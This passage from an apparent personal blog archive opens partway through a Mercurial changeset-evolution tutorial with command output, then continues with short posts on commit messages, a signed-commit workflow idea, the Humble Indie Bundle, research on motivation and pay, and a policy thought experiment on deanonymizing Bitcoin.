| x  changeset:   4:b170dda0a4a7
|/   user:        my
|    date:        Sat Jan 12 00:17:44 2013 +0100
|    summary:     What the players want
|
o  changeset:   3:129d59901401
|  parent:      0:c19ed5b17f4f
|  user:        my
|  date:        Sat Jan 12 00:17:42 2013 +0100
|  summary:     Hello Evolution
|

Now I amended my commit, but my history does not look good, yet. Actually it looks evil, since I have 2 heads, which is not so nice. The changeset under which we just pulled away the bad change has become unstable, because its ancestor has been obsoleted, so it has no stable foothold anymore. In other DVCSs, this means that we as users have to find out what was changed and fix it ourselves.

Changeset evolution allows us to evolve our repository to get rid of dependencies on obsolete changes.

cd testmy
hg evolve
hg log -G -r 1:
cd ..
move:[5] The places
atop:[7] The wishes of the players
merging plan.txt
@  changeset:   8:0980732d20e0
|  tag:         tip
|  user:        my
|  date:        Sat Jan 12 00:17:45 2013 +0100
|  summary:     The places
|
o  changeset:   7:86e7a5305c9e
|  parent:      3:129d59901401
|  user:        my
|  date:        Sat Jan 12 00:17:50 2013 +0100
|  summary:     The wishes of the players
|
o  changeset:   3:129d59901401
|  parent:      0:c19ed5b17f4f
|  user:        my
|  date:        Sat Jan 12 00:17:42 2013 +0100
|  summary:     Hello Evolution
|

Now I have nice looking history without any hassle - and without having to resort to low-level commands.

2.4.3 Be a nice neighbor

But I rewrote history. What happens if my collegue pulls this?

hg -R testother pull testmy
hg -R testother log -G
pulling from testmy
searching for changes
adding changesets
adding manifests
adding file changes
added 2 changesets with 2 changes to 1 files (+1 heads)
(run 'hg heads' to see heads, 'hg merge' to merge)
1 new unstable changesets
o  changeset:   6:0980732d20e0
|  tag:         tip
|  user:        my
|  date:        Sat Jan 12 00:17:45 2013 +0100
|  summary:     The places
|
o  changeset:   5:86e7a5305c9e
|  parent:      1:129d59901401
|  user:        my
|  date:        Sat Jan 12 00:17:50 2013 +0100
|  summary:     The wishes of the players
|
| @  changeset:   4:65cc97fc774a
| |  user:        other
| |  date:        Sat Jan 12 00:17:48 2013 +0100
| |  summary:     The people
| |
| x  changeset:   3:2a37053027cc
| |  user:        my
| |  date:        Sat Jan 12 00:17:45 2013 +0100
| |  summary:     The places
| |
| x  changeset:   2:b170dda0a4a7
|/   user:        my
|    date:        Sat Jan 12 00:17:44 2013 +0100
|    summary:     What the players want
|
o  changeset:   1:129d59901401
|  user:        my
|  date:        Sat Jan 12 00:17:42 2013 +0100
|  summary:     Hello Evolution
|
o  changeset:   0:c19ed5b17f4f
   user:        my
   date:        Sat Jan 12 00:17:40 2013 +0100
   summary:     Hello World

As you can see, he is told that his changes became unstable, since they depend on obsolete history. No need to panic: He can just evolve his repo to be state of the art again.

But the unstable change is the current working directory, so evolve does not change it. Instead it tells us, that we might want to call it with `–any`. And as it is the case with most hints in hg, that is actually the case.

hg -R testother evolve
nothing to evolve here
(1 troubled changesets, do you want --any ?)

note: that message might be a candidate for cleanup.

hg -R testother evolve --any
hg -R testother log -G -r 1:
move:[4] The people
atop:[6] The places
merging plan.txt
@  changeset:   7:058175606243
|  tag:         tip
|  user:        other
|  date:        Sat Jan 12 00:17:48 2013 +0100
|  summary:     The people
|
o  changeset:   6:0980732d20e0
|  user:        my
|  date:        Sat Jan 12 00:17:45 2013 +0100
|  summary:     The places
|
o  changeset:   5:86e7a5305c9e
|  parent:      1:129d59901401
|  user:        my
|  date:        Sat Jan 12 00:17:50 2013 +0100
|  summary:     The wishes of the players
|
o  changeset:   1:129d59901401
|  user:        my
|  date:        Sat Jan 12 00:17:42 2013 +0100
|  summary:     Hello Evolution
|

And as you can see, everything looks nice again.

2.5 …safely

Publishing the changes into a public repo makes them immutable.

Now imagine, that my co-gamemaster publishes his work. Mercurial will then store that his changes were published and warn us, if we try to change them.

cd testother
hg up > /dev/null
echo "current phase"
hg phase .
hg push ../testpublic
echo "phase after publishing"
hg phase .
cd ..
current phase
7: draft
pushing to ../testpublic
searching for changes
adding changesets
adding manifests
adding file changes
added 5 changesets with 5 changes to 2 files
phase after publishing
7: public

Now trying to amend history will fail (except if we first change the phase to draft with `hg phase –force –draft .`).

cd testother
hg amend -m "change published history"
# change to draft
hg phase -fd .
hg phase .
# now we could amend, but that would defeat the point of this section, so we go to public again.
hg phase -p .
cd ..

abort: can not rewrite immutable changeset 058175606243
7: draft

Once I pull from that repo, the revisions which are in there will also switch phase to public in my repo.

So by pushing the changes into a publishing repo, you can get the Mercurial of all contributors to track which revisions are safe to change - and which are not. An alternative is using `hg phase -p REV`.

2.6 Fold

Do multiple commits to create a patch, then fold them into one commit.

Now I go into a bit of a planning spree.

cd testmy
echo "Scenes:" >> plan.txt
hg ci -m "we need scenes"

echo "- Lost appears" >> plan.txt
hg ci -m "scene"
echo "- People vanish" >> plan.txt
hg ci -m "scene"
echo "- Portals during dreamtime" >> plan.txt
hg ci -m "scene"
echo
hg log -G -r 9:
cd ..

@  changeset:   12:fbcce7ad7369
|  tag:         tip
|  user:        my
|  date:        Sat Jan 12 00:18:06 2013 +0100
|  summary:     scene
|
o  changeset:   11:189c0362a80f
|  user:        my
|  date:        Sat Jan 12 00:18:05 2013 +0100
|  summary:     scene
|
o  changeset:   10:715a31ac9dee
|  user:        my
|  date:        Sat Jan 12 00:18:05 2013 +0100
|  summary:     scene
|
o  changeset:   9:dfa4c226150b
|  user:        my
|  date:        Sat Jan 12 00:18:05 2013 +0100
|  summary:     we need scenes
|

Yes, I tend to do that…

But we actually only need one change, so make it one by folding the last 4 changes changes into a single commit.

Since fold needs an interactive editor (it does not take -m, yet), we will leave that out. The commented commands allow you to fold the changesets.

cd testmy
# hg fold -r "-1:-4"
# hg log -G -r 9:
cd ..

2.7 Split

Do one big commit, then split it into two atomic commits.

Now I apply the scenes to wishes, places and people. Which is not useful: First I should apply them to the wishes and check if all wishes are fullfilled. But while writing I forgot that, and anxious to show my co-gamemaster, I just did one big commit.

cd testmy
sed -i "s/The Judicator wants Action/The Judicator wants Action - portals/" plan.txt
sed -i "s/The village/The village - lost, vanish, portals/" plan.txt
hg ci -m "Apply Scenes to people and places."
echo
hg log -G -r 12:
cd ..

@  changeset:   13:5c83a3540c37
|  tag:         tip
|  user:        my
|  date:        Sat Jan 12 00:18:10 2013 +0100
|  summary:     Apply Scenes to people and places.
|
o  changeset:   12:fbcce7ad7369
|  user:        my
|  date:        Sat Jan 12 00:18:06 2013 +0100
|  summary:     scene
|

Let’s fix that: uncommit it and commit it as separate changes. Normally I would just use `hg record` to interactively select changes to record. Since this is a non-interactive test, I manually undo and redo changes instead.

cd testmy
hg uncommit --all # to undo all changes, not just those for specified files
hg diff
sed -i "s/The village - lost, vanish, portals/The village/" plan.txt
hg amend -m "Apply scenes to wishes"
sed -i "s/The village/The village - lost, vanish, portals/" plan.txt
hg commit -m "Apply scenes to places"
echo
hg log -G -r 12:
cd ..
new changeset is empty
(use "hg kill ." to remove it)
diff --git a/plan.txt b/plan.txt
--- a/plan.txt
+++ b/plan.txt
@@ -1,10 +1,10 @@
 Wishes:
 - The Solek wants emotionally intense situations
-- The Judicator wants Action
+- The Judicator wants Action - portals
 
 
 Places: 
-- The village
+- The village - lost, vanish, portals
 - The researchers cave
 
 Scenes:

@  changeset:   17:f8cc86f681ac
|  tag:         tip
|  user:        my
|  date:        Sat Jan 12 00:18:13 2013 +0100
|  summary:     Apply scenes to places
|
o  changeset:   16:6c8918a352e2
|  parent:      12:fbcce7ad7369
|  user:        my
|  date:        Sat Jan 12 00:18:12 2013 +0100
|  summary:     Apply scenes to wishes
|
o  changeset:   12:fbcce7ad7369
|  user:        my
|  date:        Sat Jan 12 00:18:06 2013 +0100
|  summary:     scene
|

2.8 …as afterthought

Do one big commit, add an atomic commit. Then split the big commit.

Let’s get the changes from our co-gamemaster and apply people to wishes, places and scenes. Then add a scene we need to fullfill the wishes and clean the commits afterwards.

First get the changes:

cd testmy
hg pull ../testother
hg merge  --tool internal:merge tip # the new head from our co-gamemaster
# fix the conflicts 
sed -i "s/<<<.*local//" plan.txt
sed -i "s/====.*/\n/" plan.txt
sed -i "s/>>>.*other//" plan.txt
# mark them as solved.
hg resolve -m
hg commit -m "merge people"
echo
hg log -G -r 12:
cd ..
pulling from ../testother
searching for changes
adding changesets
adding manifests
adding file changes
added 1 changesets with 1 changes to 1 files (+1 heads)
(run 'hg heads .' to see heads, 'hg merge' to merge)
merging plan.txt
warning: conflicts during merge.
merging plan.txt incomplete! (edit conflicts, then use 'hg resolve --mark')
0 files updated, 0 files merged, 0 files removed, 1 files unresolved
use 'hg resolve' to retry unresolved file merges or 'hg update -C .' to abandon

@    changeset:   19:8bf8d55739fa
|\   tag:         tip
| |  parent:      17:f8cc86f681ac
| |  parent:      18:058175606243
| |  user:        my
| |  date:        Sat Jan 12 00:18:16 2013 +0100
| |  summary:     merge people
| |
| o  changeset:   18:058175606243
| |  parent:      8:0980732d20e0
| |  user:        other
| |  date:        Sat Jan 12 00:17:48 2013 +0100
| |  summary:     The people
| |
o |  changeset:   17:f8cc86f681ac
| |  user:        my
| |  date:        Sat Jan 12 00:18:13 2013 +0100
| |  summary:     Apply scenes to places
| |
o |  changeset:   16:6c8918a352e2
| |  parent:      12:fbcce7ad7369
| |  user:        my
| |  date:        Sat Jan 12 00:18:12 2013 +0100
| |  summary:     Apply scenes to wishes
| |
o |  changeset:   12:fbcce7ad7369
| |  user:        my
| |  date:        Sat Jan 12 00:18:06 2013 +0100
| |  summary:     scene
| |

Now we have all changes in our repo. We begin to apply people to wishes, places and scenes.

cd testmy
sed -i "s/The Solek wants emotionally intense situations/The Solek wants emotionally intense situations | specter, Lost/" plan.txt
sed -i "s/Lost appears/Lost appears | Lost/" plan.txt
sed -i "s/People vanish/People vanish | Specter/" plan.txt
hg commit -m "apply people to wishes, places and scenes"
echo
hg log -G -r 19:
cat plan.txt
cd ..

@  changeset:   20:c00aa6f24c3f
|  tag:         tip
|  user:        my
|  date:        Sat Jan 12 00:18:18 2013 +0100
|  summary:     apply people to wishes, places and scenes
|
o    changeset:   19:8bf8d55739fa
|\   parent:      17:f8cc86f681ac
| |  parent:      18:058175606243
| |  user:        my
| |  date:        Sat Jan 12 00:18:16 2013 +0100
| |  summary:     merge people
| |
Wishes:
- The Solek wants emotionally intense situations | specter, Lost
- The Judicator wants Action - portals


Places: 
- The village - lost, vanish, portals
- The researchers cave


Scenes:
- Lost appears | Lost
- People vanish | Specter
- Portals during dreamtime


People:
- The Lost
- The Specter

As you can see, the specter only applies to the wishes, and we miss a person for the action.

Let’s fix that.

cd testmy
sed -i "s/- The Specter/- The Specter\n- Wild Memories/" plan.txt
sed -i "s/- Portals during dreamtime/- Portals during dreamtime\n- Unconnected Memories/" plan.txt
hg ci -m "Added wild memories to fullfill the wish for action"
echo
hg log -G -r 19:
cd ..

@  changeset:   21:5393327d2d3f
|  tag:         tip
|  user:        my
|  date:        Sat Jan 12 00:18:20 2013 +0100
|  summary:     Added wild memories to fullfill the wish for action
|
o  changeset:   20:c00aa6f24c3f
|  user:        my
|  date:        Sat Jan 12 00:18:18 2013 +0100
|  summary:     apply people to wishes, places and scenes
|
o    changeset:   19:8bf8d55739fa
|\   parent:      17:f8cc86f681ac
| |  parent:      18:058175606243
| |  user:        my
| |  date:        Sat Jan 12 00:18:16 2013 +0100
| |  summary:     merge people
| |

Now split the big change into applying people first to wishes, then to places and scenes.

cd testmy
# go back to the big change
hg up -r -2
# uncommit it
hg uncommit --all
# Now rework it into two commits
sed -i "s/- Lost appears | Lost/- Lost appears/" plan.txt
sed -i "s/- People vanish | Specter/- People vanish/" plan.txt
hg amend -m "Apply people to wishes"
sed -i "s/- Lost appears/- Lost appears | Lost/" plan.txt
sed -i "s/- People vanish/- People vanish | Specter/" plan.txt
hg commit -m "Apply people to scenes"
# let’s mark this for later use
hg book splitchanges
# and evolve to get rid of the obsoletes
echo
hg evolve --any
hg log -G -r 19:
cd ..
1 files updated, 0 files merged, 0 files removed, 0 files unresolved
new changeset is empty
(use "hg kill ." to remove it)
1 new unstable changesets

move:[21] Added wild memories to fullfill the wish for action
atop:[24] Apply people to wishes
merging plan.txt
@  changeset:   26:ab48ecaceb01
|  tag:         tip
|  parent:      24:909bb640d4fc
|  user:        my
|  date:        Sat Jan 12 00:18:20 2013 +0100
|  summary:     Added wild memories to fullfill the wish for action
|
| o  changeset:   25:76083662b263
|/   bookmark:    splitchanges
|    user:        my
|    date:        Sat Jan 12 00:18:23 2013 +0100
|    summary:     Apply people to scenes
|
o  changeset:   24:909bb640d4fc
|  parent:      19:8bf8d55739fa
|  user:        my
|  date:        Sat Jan 12 00:18:23 2013 +0100
|  summary:     Apply people to wishes
|
o    changeset:   19:8bf8d55739fa
|\   parent:      17:f8cc86f681ac
| |  parent:      18:058175606243
| |  user:        my
| |  date:        Sat Jan 12 00:18:16 2013 +0100
| |  summary:     merge people
| |

You can see the additional commit sticking out. We want to get the history easy to follow, so we just graft the last last change atop the split changes.

note: We seem to have the workdir on the new changeset instead of on the one we did before the evolve. I assume that’s a bug to fix.

cd testmy
hg up splitchanges
hg graft -O tip
hg log -G -r 19:
cd ..
1 files updated, 0 files merged, 0 files removed, 0 files unresolved
grafting revision 26
merging plan.txt
@  changeset:   27:4d3a40c254b4
|  bookmark:    splitchanges
|  tag:         tip
|  parent:      25:76083662b263
|  user:        my
|  date:        Sat Jan 12 00:18:20 2013 +0100
|  summary:     Added wild memories to fullfill the wish for action
|
o  changeset:   25:76083662b263
|  user:        my
|  date:        Sat Jan 12 00:18:23 2013 +0100
|  summary:     Apply people to scenes
|
o  changeset:   24:909bb640d4fc
|  parent:      19:8bf8d55739fa
|  user:        my
|  date:        Sat Jan 12 00:18:23 2013 +0100
|  summary:     Apply people to wishes
|
o    changeset:   19:8bf8d55739fa
|\   parent:      17:f8cc86f681ac
| |  parent:      18:058175606243
| |  user:        my
| |  date:        Sat Jan 12 00:18:16 2013 +0100
| |  summary:     merge people
| |

note: We use graft here, because using a second amend would just change the changeset in between but not add another change. If there had been more changes after the single followup commit, we would simply have called evolve to fix them, because graft -O left an obsolete marker on the grafted changeset, so evolve would have seen how to change all its children.

That’s it. All that’s left is finishing plan.txt, but I’ll rather do that outside this guide :)

3 Conclusion

Evolve does a pretty good job at making it convenient and safe to rework history. If you’re an early adopter, I can advise testing it yourself. Otherwise, it might be better to wait until more early adopters tested it and polished its rough edges.

note: hg amend was subsumed into hg commit –amend, so the dedicated command will likely disappear.

PS: In case you’re interested: The roleplaying session worked out wonderfully and a good deal of our planning actually survived the contact with the players - enough that we could wing the rest with short coordination meetings in which we two game masters enthusiastically told each other what happened in the respective group, planned the next steps and enjoyed the evil gamemasters giggle ☺.

note: This guide was created by Arne Babenhauserheide with emacs org-mode and turned to html via M-x org-export-as-html - including results of the evaluation of the code snippets.

Date: 2013-01-12T00:18+0100

Author: Arne Babenhauserheide

Org version 7.9.2 with Emacs version 24

Validate XHTML 1.0
AnhangGröße
hg-evolve-2013-01-12.pdf254.54 KB
hg-evolve-2013-01-12.org13.19 KB

Track your scientific scripts with Mercurial

If you want to publish your scientific scripts, as Nick Barnes advises in Nature, you can very easily do so with Mercurial.

All my stuff (not just code), excempting only huge datasets, is in a Mercurial source repository.1

Whenever I change something and it does anything new, I commit the files with a simple commit (even if it’s only “it compiles!”).

With that I can always check “which were the last things I did” (look into the log) or “when did I change this line, and why?” (annotate the file). Also I can easily share my scripts folder with others and Mercurial can merge my work and theirs, so if they fix a line and I fix another line, both fixes get integrated without having to manually copy-paste them around.

For all that it doesn’t need much additional expertise: The basics can be learned in just 15 minutes — and you’ll likely never need more than these for your work.2

Update 2013: Nowadays I include the revision of scripts I use in the name of their output files or folders, so I always know which version of my scripts I used to create some result.


  1. Mercurial is free software for versiontracking: http://mercurial-scm.org 

  2. You can use Mercurial in three main ways:

concise commit messages

Written in the discussion about a pull request for Freenet.

When I look up a commit, I’m not searching for prose. I’m searching for short snippets of information I need. If they are long-winded explanations, I am unlikely to even read them.

To understand this, please imagine coming back home, getting off the bike and taking 15 minutes to look at the most recent pull-request. You know that you’ll need to start making dinner at 19:00, so there is no time to waste.

With long winded commit messages that plays out like this:

You look into the pull-request and the explanations are longer than the code changes. You can either read half the explanations or just look at the code. So you try to understand what the code does and what it intends to do from the code alone. After 15 minutes you post a partial review and start cooking. Next slot for code review is tomorrow evening, or maybe next friday. The pull-request lies open for several weeks while more changes pile up.

Contrast that with short commit messages:

You look into the pull-request. The commit message gives you the intention of the change (“sounds good”), maybe with a short note on non-obvious side-effects of the implementation, and you skim the code to see whether it realizes the intention. If it does and you don’t see problems which the writer might have overlooked: Great, code review finished. You write the review and go make dinner. The pull-request is merged the same week.

That’s why I’d suggest to just write short messages and put detailed explanations into a blog. If you like writing those explanations. That’s what you have a blog for, and you can search that later if you need these notes. If they are essential to understand effects of later changes, you might want to document them in a text file like HACKING or docs/devnotes.txt.

The Linux kernel has nice examples of concise commit messages:

Note that the merge commit already almost looks like an entry into a NEWS file using the Perl Changes Format. (If NEWS files cause you merging pain, consider setting a union merge rule.)

workflow concept: automatic trusted group of committers

Goal

A workflow where the repository gets updated only from repositories whose heads got signed by at least a certain percentage or a certain number of trusted committers.

Requirements

Mercurial, two hooks for checking and three special files in the repo.

The hooks do all the work - apart from them, the repo is just a normal Mercurial repository. After cloning it, you only need to setup the hooks to activate the workflow.

Extensions: gpg

Hooks: prechangegroup and pretxnchangegroup

Files: .hgtrustedkeys , .hgbackuprepos , .hgtrustminimum

concept

Hooks

  • prechangegroup: Copy the local versions of the files for access in the pretxnchangegroup hook (might be unnecessary by letting the pretxnchangegroup hook use the rollback-info).

  • pretxnchangegroup:

    • per head: check if the tipmost non-signature changeset has been GnuPG signed by enough trusted keys.
    • If not all heads have enough signatures, rollback, discard the current default repo and replace it with the backup repo which has the most changesets we lack. Continue discarding bad repos until you find one with enough signatures.

Special Files

.hgtrustedkeys contains a list of public GnuPG keys.

.hgbackuprepos contains a list of (pull) links to backup repositories.

.hgtrustminimum contains the percentage or number of keys from which a signature is needed for a head to be accepted.

Notes

With this workflow you can even do automatic updates from the repository. It should be ideal for release repositories of distributed projects.

If you want to work on the project, a very worthwhile goal might be implementing it in infocalypse: anonymous code collaboration via Freenet and Mercurial, built to survive the informational apocalypse (and any kind of censorship).

Politics and Free Licensing

Being unpolitical
means being political
without realizing it.
— Arne Babenhauserheide

Here you’ll find texts about politics and free licensing. Some of my creative works on the topic can be found under Songs, though.

More technical articles on using free software is filed under Free Software.

How to make a million dollars in pay-what-you-want — thoughts on the Humble Indie Bundle

Some thoughts1 on how the humble Indie Bundle managed to get more than 1.25 Million Dollars2 in one and a half weeks — more than one quarter of that from GNU/Linux users.

Let me repeat that: One quarter of the money came from GNU/Linux users. And the average GNU/Linux user paid almost twice as much for the game as the average Windows user.

How they did it? If I could give you a simple recipe which is certain to work for everyone, I might just hire up at Blizzard.

But I think a big part is that (from my view — and obviously from the view of others, too) they did everything right. And I mean everything:

  • The games are great.

  • The message the name “humble indie bundle” conveys is great.

  • You could pay whatever you want. From 1 cent to a million. The highest single contribution was 3,333.33$, with an average contribution of $9.17 over all platforms and $14.52 from the average GNU/Linux user3.

  • You could directly see how much money they made on the front page, along with an info about the average contribution, split by platform.

  • Normally each game would have cost 20$, so the average payment for all games also was a significant price drop.

  • They donated about one third to charitable organizations. The buyers could decide how much should go to whom.

  • Payment was easy via Paypal and others.

  • All games work on GNU/Linux, MacOSX and Windows out of the box.

  • Each game already had a community. The bundle bundled their impact so it went viral on Twitter, identi.ca, facebook, etc.

  • They have clear and simple download links. Should I ever lose the games locally, I can just redownload them. If need be with wget.

  • They use no DRM or similar, so I can show the games to friends and won’t be troubled by use restrictions.

  • And on the last day they announced that for 4 of the 6 games the code would become free software if they would crack the 1 million dollar boundary. It took just over 16 more hours to raise additional 200,000$. And they followed up on their pledge with 2 games already freed and 2 more to follow as soon as the code is cleaned up.

To wrap it up: They did everything right, so almost everybody who saw it was delighted and there was nothing to break the viral network effects.

And I think that getting any one of these points wrong would have killed a major part of the network effect, because the naysayers are far stronger in the networking game than the fans.

Any foul trick would have cost them many fans, because someone would have been bound to find out and go viral with it.


  1. Originally written as comment to Why Games don't get ported to Linux...A game dev speaks

  2. Stats directly from the Website of the Humble Indie Bundle

  3. More exactly:

    • Total revenue: $1,273,593
    • Number of contributions: 138,812
    • Average contribution: $9.17
      • Windows: $8.05
      • MacOSX: $10.18
      • GNU/Linux: $14.52

Motivation and Reward

Debunking the myth that you can increase the performance of creative workers with carrot and stick.

Executive Summary

For creative tasks, the quality of performance strongly correllates with intrinsic motivation: Being interested in the task itself.

This article will only talk about that.

The main factors which are commonly associated with intrinsic motivation are:

  • Positive verbal feedback which increases intrinsic motivation.
  • Payment independent of performance which actually has no effect.
  • Payment dependent on performance which reduces the motivation on the long term.
  • Negative verbal feedback which directly reduces intrinsic motivation.
  • Threatening someone with punishment which strongly reduces intrinsic motivation.

To make it short: Anything which diverts the focus from the task at hand towards some external matter (either positive or negative) reduces the intrinsic motivation and that in turn reduces work performance.

If you want to help people perform well, make sure that they don’t have to worry about other stuff besides their work and give them positive verbal feedback about the work they do.

Background

Since this claim goes pretty much against the standard ideology of market-trusting economists, I want to back it with solid scientific background.

The easiest way to do that is going to google scholar and searching for research on motivation and rewards. It gives a meta-analysis of experiments on the effects of extrinsic rewards on intrinsic motivation:

A meta-analytic review of experiments examining the effects of extrinsic rewards on intrinsic motivation.
— E.L. Deci, R Koestner, R.M. Ryan - Psychological bulletin, 1999 - psycnet.apa.org

This paper is cited by 2324 other papers Google knows about, which is an indicator of being accepted by the psychological community (except if it should have 2324 rebuttals) - an indicator which even those can understand who are not really versed in that community (for example me).

I dug into the paper to find solid scientific research on the effects of payment on motivation. And that led me to this older paper from Edward L. Deci:

The Effects of Contingent and Noncontingent Rewards and Controls on Intrinsic Motivation
— Edward L. Deci, University of Rochester, Organizational Behavior and Human Performance, 1972

Their research question was trying to find out if money paid unconditionally weakens intrinsic motivation like money paid for good performance:

» Two recent papers (Deci, 1971, 1972) have presented evidence that when money was paid to subjects for performing intrinsically motivated activities, and when that money was made contingent on their performance, they were less intrinsically motivated after the experience with money than were subjects who performed the same activity for no pay.«

This is about intrinsic motivation: The kind of motivation which fuels artists and other creative people and allows them to do great deeds.

It’s the kind of motivation, a company should try to inspire in every employee who does anything remotely creative or complex.

What reduces intrinsic motivation

There was previous research which showed a reduction of intrinsic motivation due to payment. To make their research solid, the first thing E.L. Deci and his group did was a replication to ensure that the basic theory is correct.

In another experiment using the one-session paradigm, Deci and Cascio (1972) showed that negative feedback resulting from bad performance on an intrinsically motivated activity caused a decrease in intrinsic motivation.

In my words: Tell people that they do bad work and you reduce their motivation - not surprisingly.

“Your performance sucks” → intrinsic motivation decreases.

Further, Deci and Caseio (1972) reported that when subjects were threatened with punishment for poor performance, their intrinsic motivation also decreased.

Threaten people, and their motivation gets reduced, too.

“If you fail, you’re fired” → intrinsic motivation decreases.

[…]Deci (1972) replicated the finding that subjects who were paid one dollar per puzzle solved showed a decrease in intrinsic motivation.

Pay people for good performance and you reduce their motivation.

“For each housing loan you sell, you get 20€” → intrinsic motivation decreases.

This is the result which actually marks all the performance-based payment schemes which are so popular with the administration folks as utter nonsense - at least for creative and complex jobs.

For those jobs your employees enjoy doing, bonusses actually decrease performance on the long run. These are the kinds of jobs in which people can work overnight and concentrated for hours and lose track of time while they work on systems which are too complex for most people to even pretend to understand. The kind of jobs where some people get into the flow and do more work in an hour than other people do in a week. Jobs in science, in programming and actually in any other topic in which you do not just follow prescribed rules but actually solve problems.

The kind of jobs which is more and more common, because jobs with prescribed rules can just as well be done by machines.

And social jobs, the other kind of jobs for which you need people, because people doing social jobs work with people and anything involving people is a complex problem by definition. At least if you want really good results.

Or, seen from a different perspective: If two companies compete in a segment of the market and one has motivated people and the other doesn’t - and other factors are mostly equal - then the company with motivated people wins.

So you want motivated people. And in creative, complex or social jobs, you want them intrinsically motivated. You want them to do a good job for the sake of doing a good job.

Which means, you want to avoid

  • giving them negative feedback,
  • threatening them and
  • paying them based on their performance.

With that in mind, let us go on: How can we actually motivate people?

What enhances motivation

To answer that, let’s listen to research again:

On the other hand, Deei (1971, 1972) has reported that verbal reinforcements do not decrease intrinsic motivation; in fact, they appear to enhance it.

So, to increase motivation, tell people that they do good work.

„I like that plan! Go for it!“ → intrinsic motivation increases.

That’s all you can do. Tell them that they do good work. Encourage them.

But isn’t there a paradox? How can we actually employ people, if paying them money for good work decreases their motivation?

How to pay motivated people?

That’s the real question, the paper from Edward L. Deci tackled:

While extrinsic rewards such as money can certainly motivate behavior, they appear to be doing so at the expense of intrinsic motivation. […but…] when payments were not contingent upon performance, intrinsic motivation did not decrease.

So the answer is pretty simple: Just pay them money independent of how well they do.

„You get 3000€ a month. Flat. That’s enough to lead a good life.“1 → intrinsic motivation stays stable.

The real trick is to just give them money, independent of how well they do. If motivated people work for you, ensure that they do not have to worry about money. Do all you can to take money concerns off their mind.

And tell them what they do well.

At least that’s what you should do if you want to base your actions on research instead of on the broken intuition of people who get paid for their performance in convincing you of their ideology (and consequently often do so in blatant, uncreative ways).

If you do that already: That’s great! Likely it’s really cool to work with you.

Illustration

A very illustrative experiment on losing intrinsic interest due to external reward was done by Lepper, Mark R.; Greene, David; Nisbett, Richard E..2

They observed three groups of pre-school children. The first group was told that they would get a “certificate with a gold seal and ribbon” if they would draw something. The second group wasn’t told that they would get a reward, but got it after drawing, too. The third group did not get any reward and did not expect any.

Before the start of the experiment, their intrinsic interest in drawing was measured by observing how much time they spent drawing when they had the chance.

One to two weeks after the experiment, the intrinsic interest of the children was measured again by observing them through a one-way mirror.

In that subsequent measurement, the children who had been told that they would get the reward for drawing (and had gotten the reward) used half as much time for drawing as those who had not gotten any reward or those who had gotten an unexpected reward.

And even when the pictures which they had drawn during the initial test were compared, the pictures from the group who expected a reward were of significantly lower quality than the pictures from the two other groups. the difference between expected extrinsic reward and no reward was 2.18 vs. 2.69 on an independently judged quality scale between 1 (very poor) and 5 (very good).

So offering children a reward for drawing not only reduces their intrinsic interest in drawing, but also reduces the quality of the pictures they draw.

And this is perfectly in line with the results from the paper from Edward L. Deci on intrinsic motivation of adults.

Summary

To increase the motivation of people, DO

  • Pay them a good monthly income, so they don’t have to worry about money, and
  • Give them positive verbal feedback on the things they do well.

Update: Good fixed income and long term contracts are a tool to allow people to work full-time without reducing their motivation. They avoid the harmful effect performance-based payment can have on performance while enabling people to work full-time on a project. An empirical study found, that the source and intensity of motivation of free software developers does not differ significantly between people who work for hire and people who work without payment, so many companies employing free software developers seem to do it right (or only the companies who do it right can keep their free software programmers).3

And should you happen to be interested in helping a free software project with money, just employ some of the people hacking on the project - and give them a good, longterm contract with enough freedom of choice, so they don’t have to worry about money or what they are allowed to do, but can instead focus on working to make the project succeed - like they did before you employed them, but now with more time at their disposal. And, as with anything else, give them positive feedback on the things they do well.

In the paper »Why Hackers Do What They Do: Understanding Motivation and Effort in Free/Open Source Software Projects« from 2005, Karim R. Lakhani and Robert G Wolf showed empirically that the payment people get to work in free software projects has no detrimental effect on their intrinsic motivation. In their sample 40% of the developers were paid for their work on free software projects and their intrinsic motivation was as high as the motivation of unpaid developers.

Key Takeaway:

If you want to help people perform well, make sure that they don’t have to worry about other stuff besides their work and give them positive verbal feedback about the work they do.


  1. Actually the ideal yearly income would be 60.000€, but only few people earn that much. Which might be a societal problem in itself which limits the performance we could have as society. If that’s something you want to tackle: Head into politics and change the world - or found a company and do it right from the start. There’s a lot which even a small group of motivated people can achieve. 

  2. Undermining children's intrinsic interest with extrinsic reward by Mark R. Lepper and David Greene from Stanford University and Richard E. Nisbett from the University of Michigan, Journal of Personality and Social Psychology, Vol 28(1), Oct 1973, 129-137. doi: 10.1037/h0035519 

  3. We find […], that enjoyment-based intrinsic motivation, namely how creative a person feels when working on the project, is the strongest and most pervasive driver. The source and intensity of motivation of free software developers does not differ significantly between people who work for hire and people who work without payment. From Why Hackers Do What They Do: Understanding Motivation and Effort in Free/Open Source Software Projects by Karim R. Lakhani* and Robert G Wolf** from the * MIT Sloan School of Management | The Boston Consulting Group and ** The Boston Consulting Group. 

3 steps to destroy Bitcoin for anonymous usage

Org (source)

PDF (print)

Bitcoin is often treated as a haven for black market buyers and people who want to avoid illegitimate laws. However 3 simple steps would suffice to mostly obliterate Bitcoin for black market usage of ordinary users.

Breaking Bitcoin

Three steps to break Bitcoin for small scale anonymous usage:

  1. infrastructure: Make it possible for users to register their Bitcoin wallets with their real identity.
  2. law or terms of service: Make it illegal to accept money from unregistered users.
  3. program: create a script to check transactions whether the transferred bitcoins were tainted by being in wallets of unregistered users. Tainted bitcoins lose value, because non-anonymous services won’t be able to accept tainted Bitcoins anymore, so anonymous services become more expensive. Allow people to avoid being tainted by anonymous transactions by sending back the same value minus mining fees within a week.

That’s it. It will not deanonymize all of Bitcoin, but it will deanonymize most users, and making any kind of sustainable profit from Bitcoin will require identity fraud - which carries so harsh penalties that most small scale black market sellers will not dare going that far.

And enacting this does not even need a state. It can be be pulled off by any large entity which accepts Bitcoin as payment, like Paypal or Microsoft.

It gets worse

And it gets worse: large scale Bitcoin owners and black market sellers will have an incentive to pressure their buyers into registration after their sale, because that will increase the effective value of their Bitcoins. Implement the method I outlined, and greed will drive the users themselves to make Bitcoin a hostile place for anonymous users.

People might run shemes to sell at high price to anonymous users and then pressure them into registering, so the bitcoins will become more valuable. Or to sell them registration with false identities. Which they could even report later, after they transferred their bitcoins at high value to someone else to disrupt a competitors business.

Happy Ending

Voilà, for ordinary Bitcoin becomes a viable, happy do-good, decentralized currency with full public accountability which can reduce the trust requirement in the banking system and simplify tax enforcement, while people who can launder money today can still use that power in Bitcoin and even get a few new tools in their toolbox to increase their power relative to ordinary and/or law-abiding users.

